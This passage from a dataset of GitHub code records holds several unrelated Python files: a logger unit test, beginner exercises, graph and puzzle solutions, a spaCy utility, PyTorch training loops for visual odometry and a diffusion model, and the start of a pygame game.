5,\n },\n \"V\": {\n 0: 68,\n 1: 68,\n 2: 68,\n 3: 71,\n 4: 71,\n 5: 72,\n 6: 72,\n 7: 72,\n 8: 72,\n 9: 72,\n },\n }\n )\n exp_logs_converted = {\n \"ill\": exp_ill,\n \"aware\": exp_aware,\n \"vacc\": exp_vacc,\n }\n\n logger = Logger(\"model\", \"network\")\n for i in raw_logs:\n logger.add_global_stat(i)\n\n self.assertEqual(\n logger._global_stats_converted,\n {},\n \"Before convertion of logs field 'stat' should be empty\",\n )\n\n logger.convert_logs(model_hyperparams)\n for phenomena, stat in logger._global_stats_converted.items():\n pd.testing.assert_frame_equal(\n exp_logs_converted[phenomena], stat, check_dtype=False\n )\n\n def test__add_log(self):\n \"\"\"Check if logs are being colledded proprely during simulation.\"\"\"\n raw_logs = prepare_logs()\n logger = Logger(\"model\", \"network\")\n\n lengths__raw_stats = [len(logger._global_stats)]\n for log in raw_logs:\n logger.add_global_stat(log)\n lengths__raw_stats.append(len(logger._global_stats))\n\n exp_lengths = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n self.assertEqual(\n lengths__raw_stats,\n exp_lengths,\n f\"Lengths of '_raw_stats' field should be like {exp_lengths}, \"\n f\"got 
{lengths__raw_stats}.\",\n )\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","repo_name":"anty-filidor/network_diffusion","sub_path":"network_diffusion/tests/test_logger.py","file_name":"test_logger.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"26711954730","text":"# with open(\"file1.txt\") as file:\n# file1 = file.readlines()\n\n\n\n# with open(\"file2.txt\") as file:\n# file2 = file.readlines()\n\n\n\n# result = [int(num.strip()) for num in file1 if num in file2]\n\n# # Write your code above 👆\n\n# print(result)\n\n# sentence = \"What is the Airspeed Velocity of an Unladen Swallow?\"\n# # Don't change code above 👆\n\n# # Write your code below:\n# sentence_list = sentence.split()\n\n# result1 = {word:len(word) for word in sentence_list}\n\n# # word_amount = {word:}\n\n\n\n# print(result1)\n\n# weather_c = {\n# \"Monday\": 12,\n# \"Tuesday\": 14,\n# \"Wednesday\": 15,\n# \"Thursday\": 14,\n# \"Friday\": 21,\n# \"Saturday\": 22,\n# \"Sunday\": 24,\n# }\n# # 🚨 Don't change code above 👆\n\n\n# # Write your code 👇 below:\n# weather_f = {day:(temp * 9/5) + 32 for (day, temp) in weather_c.items()}\n\n\n# print(weather_f)\n\nstudent_dict = {\n \"student\": [\"Alex\", \"Beth\", \"Caroline\"],\n \"score\": [56, 76, 98]\n}\n\nimport pandas\nstudent_data_frame = pandas.DataFrame(student_dict)\nprint(student_data_frame)\n\n#Loop through data frame\n# for (key, value) in student_data_frame.items():\n# print(value)\n\n#Loop through rows of data frame\nfor (index, row) in student_data_frame.iterrows():\n if row.student == \"Alex\":\n print(row.score)\n\n","repo_name":"Btech31488/100DaysOfCode","sub_path":"Day26/day_26_exercise/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10794283306","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int,input().split())\nedge = [[sys.maxsize for _ in range(n)] for _ in range(n)]\nfor _ in range(m):\n a, b = map(int,input().split())\n edge[a-1][b-1] = 1\n edge[b-1][a-1] = 1\nfor k in range(n):\n edge[k][k] = 0\n for i in range(n):\n for j in range(n):\n edge[i][j] = min(edge[i][j], edge[i][k] + edge[k][j])\n\nanswer = sys.maxsize\nfirst, second = -1, -1\nfor i in range(n-1):\n for j in range(i+1, n):\n check = 0\n for k in range(n):\n check += min(edge[i][k], edge[j][k]) * 2\n if check >= answer:\n break\n if answer > check:\n answer = check\n first = i+1\n second = j+1\nprint(first, second, answer)","repo_name":"hyunjinee/Algorithm","sub_path":"solved.ac/python/21278.py","file_name":"21278.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"33999721557","text":"#!/usr/bin/env python3\n#\n# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n\n\nimport spacy\nimport pandas as pd\n\nmodel = spacy.load('en')\n\n\ndef sentence_df(sentence):\n \"\"\"Represent sentence as a dataframe to display nlp info\n\n Arguments:\n sentence (str)\n Returns:\n df (dataframe)\n \"\"\"\n doc = model(sentence)\n index, data = get_nlp_data(doc)\n df = pd.DataFrame(data=data, index=index)\n return df\n\n\ndef get_nlp_data(doc):\n \"\"\"Parses doc and returns nlp data in a dict\n\n Arguments: doc (spaCy doc)\n Returns: token (list), data (dict)\n 
\"\"\"\n token = [token for token in doc]\n dep = [token.dep_ for token in doc]\n lemma = [token.lemma_ for token in doc]\n is_stop = [token.is_stop for token in doc]\n is_alpha = [token.is_alpha for token in doc]\n shape = [token.shape_ for token in doc]\n tag = [token.tag_ for token in doc]\n\n nc = list(doc.noun_chunks)\n nc_flat = [token for chunk in nc for token in chunk]\n nc_bool = [token in nc_flat for token in doc]\n n_chunk = []\n for tok in token:\n if tok in nc_flat:\n for chunk in nc:\n if tok in chunk:\n n_chunk.append(chunk)\n else:\n n_chunk.append(None)\n\n data = {\n 'token': token,\n 'dep': dep,\n 'lemma': lemma,\n 'is_stop': is_stop,\n 'is_alpha': is_alpha,\n 'shape': shape,\n 'tag': tag,\n 'nc_bool': nc_bool,\n 'n_chunk': n_chunk\n }\n return token, data\n","repo_name":"mnguyenngo/nlpkit","sub_path":"nlpkit/sentence_df.py","file_name":"sentence_df.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4863834062","text":"# Train and Test Loop Functions\r\n#!pip install tensorboard\r\n#from torch.utils.tensorboard import SummaryWriter\r\nimport time\r\nimport sys\r\nimport math\r\nimport torch\r\nfrom params import par\r\n#from datasets import training_data_pose, training_data_depth\r\nfrom utils import util\r\nfrom datatracker import datalogger, Hook\r\nimport wandb\r\n\r\nfrom torchviz import make_dot\r\n\r\n'''\r\n\r\n TODO:\r\n 1. Edit train loop to reflect D3VO (no ground truth, data shapes, number of samples, etc.)\r\n 2. Get tensorboard setup to see smaller images, depth, uncertainty, etc. in google colab\r\n\r\n Edited: 9/24/22\r\n'''\r\n'''\r\ndef train_loop(img_dir, train_file, training_data_pose, training_data_depth, \r\n posenet_model, depthnet_model, loss_fn, pose_optimizer, depth_optimizer,\r\n batch_size, writer, dataset_type):'\r\n'''\r\ndef train_loop(img_dir, train_file, training_data_pose, training_data_depth, \r\n posenet_model, depthnet_model, loss_fn, joint_optimizer,\r\n batch_size, writer, dataset_type):\r\n \r\n #curr_usage = float(torch.cuda.memory_allocated(par.device))\r\n #max_usage = float(torch.cuda.max_memory_allocated(par.device))\r\n #print(\"GPU Usage: \" + str(curr_usage/max_usage) + \"%\")\r\n\r\n # Initializations\r\n avg_train_loss = 0 # tracking train loss\r\n\r\n # Going through all of the training data\r\n idx = 0 # Index of source image batch in that folder\r\n\r\n # Starting Training Time\r\n training_t0 = time.time()\r\n \r\n c = 0 # c is now the index for the shuffled data\r\n batch = c\r\n \r\n # Training Mode\r\n depthnet_model.train() \r\n posenet_model.train()\r\n \r\n idx = 0\r\n # Read in data\r\n train_data_files = open(train_file,'r')\r\n train_list = train_data_files.readlines()\r\n train_data_files.close()\r\n # Shuffle data\r\n shuffled_list = util.shuffle_sequence(train_list)\r\n N = int(len(shuffled_list)/par.batch_size)\r\n #loss_grads = []\r\n \r\n #use_amp = True\r\n #scaler = torch.cuda.amp.GradScaler(enabled=use_amp) # For Tensor Cores ...\r\n for idx in range(N):\r\n \r\n print(\"c: \" + str(c)) # Stack index\r\n print(\"Batch # (Entire Dataset): \" + str(c) + \", \" + \"Batch Number: \" + str(idx))\r\n \r\n curr_usage = float(torch.cuda.memory_allocated(par.device))\r\n max_usage = float(torch.cuda.max_memory_allocated(par.device))\r\n print(\"GPU Usage: \" + str(100*curr_usage/max_usage) + \"%\")\r\n\r\n # Get Data for Training Iteration\r\n '''\r\n if par.use_stereo:\r\n random_pick = 
torch.randint(0,2,(1,)).item()\r\n if random_pick == 0:\r\n cam_view = \"left\"\r\n elif random_pick == 1:\r\n cam_view = \"right\"\r\n else:\r\n cam_view = \"left\"\r\n '''\r\n cam_view = \"left\"\r\n \r\n p_images = training_data_pose.__getitem__(idx, shuffled_list, cam_view)\r\n d_images = training_data_depth.__getitem__(idx, shuffled_list, cam_view)\r\n\r\n #p_images.float().to(par.device)\r\n #d_images.float().to(par.device)\r\n \r\n p_images[\"t\"].requires_grad = True\r\n #print(\"I_t grad: \" + str(p_images[\"t\"].requires_grad))\r\n p_images[\"t+1\"].requires_grad = True\r\n #print(\"I_t+1 grad: \" + str(p_images[\"t+1\"].requires_grad))\r\n p_images[\"t-1\"].requires_grad = True\r\n #print(\"I_t-1 grad: \" + str(p_images[\"t-1\"].requires_grad))\r\n d_images[\"t\"].requires_grad = True\r\n #print(\"D_t grad: \" + str(d_images[\"t\"].requires_grad))\r\n d_images[\"ts\"].requires_grad = True\r\n #print(\"D_ts grad: \" + str(d_images[\"ts\"].requires_grad))\r\n \r\n #p_images.requires_grad = True\r\n #d_images.requires_grad = True\r\n \r\n sample_idx = shuffled_list[batch_size*idx]\r\n #pose_subpath = ppaths[-1]\r\n \r\n # Prediction and Loss\r\n beta = par.beta\r\n \r\n # Intrinsic camera matrix\r\n intrinsic_mat = util.get_intrinsic_matrix(sample_idx, dataset_type) # 6/10/23 : Might need to normalize K (see monodepth github issues)\r\n util.update_intrinsics(intrinsic_mat)\r\n \r\n # Training and Loss\r\n \r\n depth_input = d_images[\"t\"]\r\n\r\n depth_block_out = depthnet_model(depth_input)\r\n depth_block_s1 = depth_block_out[('disp', 0)]\r\n depth_block_s2 = depth_block_out[('disp', 1)]\r\n depth_block_s3 = depth_block_out[('disp', 2)]\r\n depth_block_s4 = depth_block_out[('disp', 3)]\r\n\r\n # Dictionary of Scales\r\n scales = {'0':depth_block_s1,\r\n '1':depth_block_s2,\r\n '2':depth_block_s3,\r\n '3':depth_block_s4}\r\n #print(depth_block_s1.shape)\r\n # For Scaling\r\n depth_map_ = 1.0/100.0 + (1.0/1e-2 - 1.0/100.0) * depth_block_s1\r\n inv_depth_ = 1.0/depth_map_\r\n #inv_depth_ = depth_map_ \r\n mean_inv_depth = inv_depth_.mean(3,False).mean(2,False).reshape(par.batch_size,1)\r\n\r\n # Formerly in loss function\r\n pose_input = torch.cat((p_images[\"t-1\"], p_images[\"t\"]),1)\r\n #translation1, rotation1, a1, b1 = posenet_model(pose_input)\r\n translation1, rotation1 = posenet_model(pose_input)\r\n pose_6dof_t_minus_1_t = torch.cat((translation1*mean_inv_depth,rotation1),1).to(par.device)\r\n \r\n reverse_tensor = torch.cat((p_images[\"t+1\"], p_images[\"t\"]),1)\r\n #translation2, rotation2, a2, b2 = posenet_model(reverse_tensor)\r\n translation2, rotation2 = posenet_model(reverse_tensor)\r\n pose_6dof_t_t_plus_1 = torch.cat((translation2*mean_inv_depth,rotation2),1).to(par.device)\r\n \r\n #continue\r\n #depth_input = d_images[:,:3,:,:]\r\n # Always want to feed the left image in the stereo pair for either monocular or stereo case\r\n '''\r\n if par.use_stereo:\r\n if d_images[\"cam\"] == \"left\":\r\n depth_input = d_images[\"t\"]\r\n elif d_images[\"cam\"] == \"right\":\r\n depth_input = d_images[\"ts\"]\r\n else:\r\n depth_input = d_images[\"t\"]\r\n '''\r\n \r\n '''\r\n depth_input = d_images[\"t\"]\r\n \r\n depth_block_out = depthnet_model(depth_input)\r\n depth_block_s1 = depth_block_out[('disp', 0)]\r\n #depth_block_s2 = depth_block_out[('disp', 1)]\r\n #depth_block_s3 = depth_block_out[('disp', 2)]\r\n #depth_block_s4 = depth_block_out[('disp', 3)]\r\n \r\n # Dictionary of Scales\r\n scales = {'0':depth_block_out[('disp', 3)],\r\n '1':depth_block_out[('disp', 
2)],\r\n '2':depth_block_out[('disp', 1)],\r\n '3':depth_block_s1}\r\n '''\r\n\r\n '''\r\n if par.use_stereo:\r\n if d_images[\"cam\"] == \"left\":\r\n # Right Cam to Left Cam\r\n stereo_baseline = util.get_stereo_baseline_transformation(sample_idx, dataset_type)[:3,:]\r\n elif d_images[\"cam\"] == \"right\":\r\n # Left Cam to Right Cam\r\n stereo_base = util.get_stereo_baseline_transformation(sample_idx, dataset_type)[:3,:]\r\n # Inverse\r\n Rs = stereo_base[:3,:3]\r\n trans = stereo_base[:,3].view(3,1)\r\n stereo_baseline = torch.cat((torch.t(Rs),torch.matmul(-1*torch.t(Rs),trans)),1)\r\n else:\r\n stereo_baseline = util.get_stereo_baseline_transformation(sample_idx, dataset_type)[:3,:]\r\n #print(stereo_baseline)\r\n '''\r\n stereo_baseline = util.get_stereo_baseline_transformation(sample_idx, dataset_type)[:3,:].to(par.device)\r\n '''\r\n if par.use_ab:\r\n a = [a1, a2]\r\n b = [b1, b2]\r\n else:\r\n a = []\r\n b = []\r\n '''\r\n a = []\r\n b = []\r\n #continue\r\n # The memory leak is in the loss function (use continue and monitor memory usage)\r\n loss = loss_fn(p_images,\r\n d_images,\r\n scales,\r\n stereo_baseline,\r\n intrinsic_mat,\r\n pose_6dof_t_minus_1_t,\r\n pose_6dof_t_t_plus_1,\r\n a,\r\n b,\r\n beta,\r\n idx,\r\n dataset_type).float().to(par.device)\r\n \r\n #continue\r\n # Training Loss To Tensorboard\r\n #writer.add_scalar(\"Training Loss\",loss,batch)\r\n \r\n #if idx == 0:\r\n # make_dot(loss,params=dict(loss_fn.named_parameters()))\r\n\r\n # Backpropagation\r\n joint_optimizer.zero_grad()\r\n loss.backward()\r\n \r\n #if idx == 0:\r\n # make_dot(loss,params=dict(loss_fn.named_parameters()))\r\n\r\n if math.isnan(loss):\r\n sys.exit(\"Loss is NaN ...\")\r\n \r\n #if (batch%5) == 0:\r\n joint_optimizer.step()\r\n \r\n a1 = 1.0\r\n b1 = 0.0\r\n inv_depth = 1.0/100.0 + (1.0/1e-2 - 1.0/100.0) * depth_block_s1\r\n inv_depth = 1.0/inv_depth\r\n mean_inv_depth = inv_depth.mean(3,False).mean(2,False).reshape(par.batch_size)\r\n #print(mean_inv_depth.shape)\r\n util.print_regression_progress(img_dir,pose_6dof_t_minus_1_t, mean_inv_depth,\r\n a1, b1, sample_idx, dataset_type)\r\n loss_, current = loss.item(), batch \r\n avg_train_loss += loss_ # Summing train loss to average later\r\n \r\n wandb.log({\"current_train_loss\": loss})\r\n print(f\"loss: {loss:>7f} [{current+1:>5d}/{int(N):>5d}]\") # formerly n/batch_size instead of epoch_size\r\n training_t1 = time.time()\r\n training_tn = util.time_stamp(training_t0, training_t1)\r\n print(\"Total Elapsed Time for Training: \" + training_tn) \r\n idx += 1\r\n c += 1\r\n batch += 1\r\n\r\n # Edited 9-24\r\n #del p_images, d_images, depth_input, pose_input, reverse_tensor, scales\r\n #print(torch.cuda.memory_summary(par.device))\r\n\r\n #del loss, loss_, p_images, d_images, depth_input, pose_input, reverse_tensor, scales, inv_depth, mean_inv_depth, depth_block_s1, depth_block_out\r\n \r\n #print(torch.cuda.mem_get_info(par.device))\r\n #torch.cuda.empty_cache()\r\n print(\"Total Memory Allocated by Tensors: \" + str(torch.cuda.max_memory_allocated()/1e9) + \" (GB)\")\r\n\r\n avg_train_loss = avg_train_loss / batch\r\n print(f\"Avg. 
Train loss: {avg_train_loss:>8f} \\n\")\r\n    \r\n    #del p_images, pose_input\r\n    #del d_images, depth_input, depth_block_out, depth_block_s1, depth_block_s2, \r\n    #depth_block_s3, depth_block_s4\r\n    #del loss\r\n    \r\n    return avg_train_loss  \r\n","repo_name":"dwalt123/D3VO-unofficial","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"43693263067","text":"# There are N baskets, where the ith basket contains input2[i] apples.\n# We want to move apples between baskets so that all baskets have the same number of apples. What is the minimum number of apples that must be\n# moved?\n# It is guaranteed that there exists a way to move apples so as to have an equal number of apples in each basket.\n\n# Input Specification:\n# input 1: N, denoting the number of baskets.\n# input 2: array representing the number of apples in the ith basket.\n\n# Output:\n# Return the minimum number of apples that must be moved so that all baskets have the same number of apples.\n\n# Example 1:\n\n# input 1: 2\n# input 2 : [1, 3]\n\n# output : 1\n\n# input 1: 5\n# input 2: [2849, 1620, 705, 1, 30]\n\n# output : 2387\n\n\n\ndef equality(ar, n):\n    s = sum(ar) // n\n    res = 0\n    for i in ar:\n        if i > s:\n            res += i - s\n\n    return res\n\n\nn = int(input())\nar = list(map(int, input().split()))\nprint(equality(ar, n))","repo_name":"Pyk017/Competetive-Programming","sub_path":"Virtusa_Test_Questions/Equal_Apples.py","file_name":"Equal_Apples.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"}
{"seq_id":"6200320139","text":"import argparse\nimport os\nimport json\nfrom pathlib import Path\nfrom copy import deepcopy\nimport torch\nimport torch.nn.functional as F\nimport torch.utils.tensorboard\nimport torchvision.transforms.functional as TF\nimport lantern\nfrom lantern import set_seeds, worker_init_fn\nimport nicefid\nimport wandb\n\nimport data\nfrom monster_diffusion.model.model import Model\nfrom monster_diffusion import metrics\nfrom monster_diffusion.log_examples import log_examples\nfrom monster_diffusion.model.variational_encoder import VariationalEncoderLDM\nfrom monster_diffusion.generate_samples import generate_samples\nfrom monster_diffusion.generate_cheat_samples import generate_cheat_samples\nfrom monster_diffusion.tools.seeded_randn import seeded_randn\nfrom monster_diffusion.tools.inverse_lr import InverseLR\nfrom monster_diffusion.kl_weight_controller import KLWeightController\nfrom monster_diffusion.model.ema import EMAWarmup, ema_update\nfrom monster_diffusion import settings\n\n\ndef train(config):\n    set_seeds(config[\"seed\"])\n    device = torch.device(\"cuda\" if config[\"use_cuda\"] else \"cpu\")\n    torch.set_grad_enabled(False)\n\n    model = Model().eval().to(device)\n    average_model = deepcopy(model).eval()\n    variational_encoder = VariationalEncoderLDM().eval().to(device)\n    optimizer = torch.optim.AdamW(\n        list(model.parameters()) + list(variational_encoder.parameters()),\n        lr=config[\"learning_rate\"],\n        betas=(0.95, 0.999),\n        eps=1e-6,\n        weight_decay=1e-3,\n    )\n    scheduler = InverseLR(optimizer, inv_gamma=20000, power=1, warmup=0.99)\n    ema_scheduler = EMAWarmup(power=0.6667, max_value=0.9999)\n    kl_weight_controller = KLWeightController(\n        weights=[0.001],\n        targets=[config[\"kl_target\"]],\n    )\n\n    train_datastream = data.train_datastream()\n\n    train_data_loader = 
train_datastream.data_loader(\n batch_size=config[\"batch_size\"],\n n_batches_per_epoch=config[\"evaluate_every\"],\n collate_fn=list,\n num_workers=config[\"n_workers\"],\n worker_init_fn=worker_init_fn(config[\"seed\"]),\n persistent_workers=(config[\"n_workers\"] >= 1),\n )\n\n evaluate_datastreams = data.evaluate_datastreams()\n evaluate_data_loaders = {\n f\"evaluate_{name}\": (\n (\n evaluate_datastreams[name].data_loader(\n batch_size=config[\"evaluate_batch_size\"],\n collate_fn=list,\n num_workers=config[\"n_workers\"],\n )\n )\n )\n for name in [\n # \"train\",\n \"early_stopping\",\n ]\n }\n\n def generator(data_loader):\n for examples in data_loader:\n yield torch.stack(\n [TF.to_tensor(example.image).div(255) for example in examples]\n )\n\n reference_features = {\n name: nicefid.Features.from_iterator(generator(data_loader))\n for name, data_loader in evaluate_data_loaders.items()\n }\n\n if Path(\"model\").exists():\n print(\"Loading model checkpoint\")\n model.load_state_dict(torch.load(\"model/model.pt\", map_location=device))\n average_model.load_state_dict(\n torch.load(\"model/average_model.pt\", map_location=device)\n )\n variational_encoder.load_state_dict(\n torch.load(\"model/variational_encoder.pt\", map_location=device)\n )\n optimizer.load_state_dict(torch.load(\"model/optimizer.pt\", map_location=device))\n lantern.set_learning_rate(optimizer, config[\"learning_rate\"])\n kl_weight_controller.load_state_dict(\n torch.load(\"model/kl_weight_controller.pt\", map_location=device)\n )\n\n tensorboard_logger = torch.utils.tensorboard.SummaryWriter(log_dir=\"tb\")\n early_stopping = lantern.EarlyStopping(tensorboard_logger=tensorboard_logger)\n train_metrics = metrics.train_metrics()\n\n n_train_steps = 0\n for _ in lantern.Epochs(config[\"max_steps\"] // config[\"evaluate_every\"]):\n\n for examples in lantern.ProgressBar(train_data_loader, \"train\", train_metrics):\n images = torch.stack(\n [TF.to_tensor(example.image) for example in examples]\n ).div(255)\n nonleaky_augmentations = torch.stack(\n [\n torch.from_numpy(example.nonleaky_augmentations)\n for example in examples\n ]\n )\n\n ts = Model.training_ts(len(examples))\n noise = torch.randn_like(images.float())\n diffused = model.diffuse(images, ts, noise)\n with lantern.module_train(model), lantern.module_train(\n variational_encoder\n ), torch.enable_grad():\n variational_features = variational_encoder.features_(images, noise)\n predictions = model.predictions_(\n diffused,\n ts,\n nonleaky_augmentations,\n variational_features,\n )\n variational_losses = variational_features.losses()\n variational_loss = variational_losses.mean()\n loss = (\n predictions.loss(images, noise)\n + kl_weight_controller.weights[0]\n * F.softplus(\n variational_losses.log()\n - torch.tensor(kl_weight_controller.targets[0]).log(),\n beta=5,\n ).mean()\n )\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n ema_decay = ema_scheduler.get_value()\n ema_update(model, average_model, ema_decay)\n ema_scheduler.step()\n\n if n_train_steps >= 100:\n kl_weight_controller.update_([variational_loss])\n\n n_train_steps += 1\n\n tensorboard_logger.add_scalar(\n \"learning_rate\", scheduler.get_lr()[0], n_train_steps\n )\n tensorboard_logger.add_scalar(\n \"variational_weight\", kl_weight_controller.weights[0], n_train_steps\n )\n tensorboard_logger.add_scalar(\n \"kl_target\", kl_weight_controller.targets[0], n_train_steps\n )\n\n 
train_metrics[\"loss\"].update_(loss)\n train_metrics[\"variational_loss\"].update_(variational_loss)\n train_metrics[\"image_mse\"].update_(predictions.image_mse(images))\n train_metrics[\"eps_mse\"].update_(predictions.eps_mse(noise))\n\n for metric in train_metrics.values():\n metric.log_dict(tensorboard_logger, \"train\", n_train_steps)\n\n print(lantern.MetricTable(\"train\", train_metrics))\n log_examples(tensorboard_logger, \"train\", n_train_steps, examples, predictions)\n\n for n_evaluations in [20, 100, 1000]:\n tensorboard_logger.add_images(\n f\"samples/@{n_evaluations}\",\n torch.cat(\n [\n image.clamp(0, 1)\n for index, image in enumerate(\n model.sample(5, n_evaluations, progress=True)\n )\n if (index + 1) % (n_evaluations // 10) == 0\n ],\n dim=-2,\n ),\n n_train_steps,\n dataformats=\"NCHW\",\n )\n\n for name, data_loader in evaluate_data_loaders.items():\n evaluate_metrics = metrics.evaluate_metrics()\n for examples in lantern.ProgressBar(data_loader, name):\n images = torch.stack(\n [TF.to_tensor(example.image) for example in examples]\n ).div(255)\n nonleaky_augmentations = torch.stack(\n [\n torch.from_numpy(example.nonleaky_augmentations)\n for example in examples\n ]\n )\n\n evaluation_ts = average_model.evaluation_ts()\n choice = torch.tensor(\n [example.hash() % len(evaluation_ts) for example in examples]\n )\n ts = evaluation_ts[choice]\n noise = torch.stack(\n [\n seeded_randn(settings.INPUT_SHAPE, abs(example.hash()))\n for example in examples\n ]\n )\n\n with lantern.module_eval(variational_encoder):\n variational_features = variational_encoder.features(images, noise)\n\n diffused = average_model.diffuse(images, ts, noise)\n with lantern.module_eval(average_model):\n predictions = average_model.predictions(\n diffused,\n ts,\n nonleaky_augmentations,\n variational_features,\n )\n variational_losses = variational_features.losses()\n variational_loss = variational_losses.mean()\n loss = (\n predictions.loss(images, noise)\n + kl_weight_controller.weights[0]\n * F.softplus(\n variational_losses.log()\n - torch.tensor(kl_weight_controller.targets[0]).log(),\n beta=5,\n ).mean()\n )\n\n evaluate_metrics[\"loss\"].update_(loss)\n evaluate_metrics[\"variational_loss\"].update_(variational_loss)\n evaluate_metrics[\"image_mse\"].update_(predictions.image_mse(images))\n evaluate_metrics[\"eps_mse\"].update_(predictions.eps_mse(noise))\n\n for metric in evaluate_metrics.values():\n metric.log_dict(tensorboard_logger, name, n_train_steps)\n\n print(lantern.MetricTable(name, evaluate_metrics))\n log_examples(tensorboard_logger, name, n_train_steps, examples, predictions)\n\n n_evaluations = 100\n generated_features = nicefid.Features.from_iterator(\n generate_samples(model, n_evaluations=n_evaluations)\n )\n fid_scores = {\n name: nicefid.compute_fid(\n features,\n generated_features,\n )\n for name, features in reference_features.items()\n }\n for name, fid_score in fid_scores.items():\n tensorboard_logger.add_scalar(\n f\"{name}/fid@{n_evaluations}\", fid_score, n_train_steps\n )\n print(f\"{name}/fid@{n_evaluations}: {fid_score}\")\n\n n_evaluations = 20\n cheat_fid_scores = {\n name: nicefid.compute_fid(\n features,\n nicefid.Features.from_iterator(\n generate_cheat_samples(\n model,\n variational_encoder,\n evaluate_data_loaders[name],\n n_evaluations=n_evaluations,\n )\n ),\n )\n for name, features in reference_features.items()\n }\n for name, cheat_fid_score in cheat_fid_scores.items():\n tensorboard_logger.add_scalar(\n f\"{name}/cheat_fid@{n_evaluations}\",\n 
cheat_fid_score,\n n_train_steps,\n )\n print(f\"{name}/cheat_fid@{n_evaluations}: {cheat_fid_score}\")\n\n early_stopping = early_stopping.score(-fid_scores[\"evaluate_early_stopping\"])\n if early_stopping.scores_since_improvement == 0:\n torch.save(model.state_dict(), \"model.pt\")\n torch.save(average_model.state_dict(), \"average_model.pt\")\n torch.save(variational_encoder.state_dict(), \"variational_encoder.pt\")\n torch.save(optimizer.state_dict(), \"optimizer.pt\")\n torch.save(kl_weight_controller.state_dict(), \"kl_weight_controller.pt\")\n elif early_stopping.scores_since_improvement > config[\"patience\"]:\n break\n early_stopping.log(n_train_steps).print()\n\n tensorboard_logger.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--batch_size\", type=int, default=40)\n parser.add_argument(\"--evaluate_batch_size\", type=int, default=32)\n parser.add_argument(\"--learning_rate\", type=float, default=5e-5)\n parser.add_argument(\"--kl_target\", type=float, default=1e-3)\n parser.add_argument(\"--max_steps\", type=int, default=5000 * 200)\n parser.add_argument(\"--evaluate_every\", default=5000, type=int)\n parser.add_argument(\"--patience\", type=float, default=10)\n parser.add_argument(\"--n_workers\", default=8, type=int)\n parser.add_argument(\"--debug\", default=0, type=int)\n args = parser.parse_args()\n\n config = vars(args)\n config.update(\n seed=1,\n use_cuda=torch.cuda.is_available(),\n run_id=os.getenv(\"RUN_ID\"),\n )\n\n Path(\"config.json\").write_text(json.dumps(config))\n\n if config[\"debug\"] == 0:\n wandb.init(\n project=\"monster-diffusion\",\n save_code=False,\n resume=\"never\",\n magic=True,\n anonymous=\"never\",\n id=config[\"run_id\"],\n name=Path(\".guild/attrs/label\").read_text(),\n tags=[config[\"run_id\"]],\n sync_tensorboard=True,\n config=config,\n )\n\n train(config)\n","repo_name":"samedii/monster-diffusion","sub_path":"operations/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1228484519","text":"import pygame\r\nimport time\r\nimport random\r\nimport Enemy\r\nimport Player\r\nimport CombatEngine\r\nimport Items\r\nimport queue\r\n\r\n\r\npygame.init()\r\n\r\n\r\ndisplay_width = 1200\r\ndisplay_height = 800\r\n\r\nblack = (0,0,0)\r\nwhite = (255,255,255)\r\nred = (200,0,0)\r\ngreen = (0,200,0)\r\nbright_red = (255,0,0)\r\nbright_green = (0,255,0)\r\ngrey = (128,128,128)\r\n \r\nblock_color = (53,115,255)\r\n \r\nquitgame = pygame.quit\r\ngameDisplay = pygame.display.set_mode((display_width,display_height))\r\npygame.display.set_caption('Dungeons of Optional Doom')\r\nclock = pygame.time.Clock()\r\n\r\ndef text_objects(text, font, color):\r\n textSurface = font.render(text, True, color)\r\n return textSurface, textSurface.get_rect()\r\n\r\ndef button(msg,x,y,w,h,ic,ac,action=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n print(click)\r\n if x+w > mouse[0] > x and y+h > mouse[1] > y:\r\n pygame.draw.rect(gameDisplay, ac,(x,y,w,h))\r\n\r\n if click[0] == 1 and action != None:\r\n action() \r\n else:\r\n pygame.draw.rect(gameDisplay, ic,(x,y,w,h))\r\n\r\n smallText = pygame.font.SysFont(\"times\",20)\r\n textSurf, textRect = text_objects(msg, smallText, black)\r\n textRect.center = ( (x+(w/2)), (y+(h/2)) )\r\n gameDisplay.blit(textSurf, textRect)\r\n\r\n\r\ndef text(msg,x,y,w,h,ic):\r\n pygame.draw.rect(gameDisplay, 
